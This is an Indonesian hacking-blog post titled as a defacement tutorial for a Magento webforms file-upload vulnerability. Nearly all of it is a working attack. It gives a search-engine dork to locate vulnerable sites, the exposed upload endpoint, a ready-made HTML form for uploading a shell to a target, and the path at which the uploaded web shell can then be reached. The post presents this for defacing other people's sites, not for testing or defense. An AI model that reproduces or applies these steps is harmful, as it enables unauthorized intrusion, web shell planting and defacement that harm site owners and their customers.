Home Deface Hacking Tutorial Tutorial Deface "Magento File Upload Vulnerabilty"

Jumat, 21 Oktober 2016

Tutorial Deface "Magento File Upload Vulnerabilty"

Diterbitkan
Tags


Dork: inurl:js/webforms/
Prof : /js/webforms/upload/index.php
Site Vuln : []

CSRF (NotePad Save x.Html)
<form method="POST" action="https://site.Target.com/js/webforms/upload/index.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>

Cek hasil Shell/txt

https://site.target.com/js/webforms/upload/files/[random]/urshell.php

Or https://site.target.com/js/webforms/upload/files/[random]/x.txt

Artikel Terkait

Lobang Dot ID

[CONTACT US]
Dork Fresh "Open Journal System"
Comments
0 Comments


EmoticonEmoticon

:)
:(
hihi
:-)
:D
=D
:-d
;(
;-(
@-)
:o
:>)
(o)
:p
:-?
(p)
:-s
8-)
:-t
:-b
b-(
(y)
x-)
(h)
Langganan: Posting Komentar (Atom)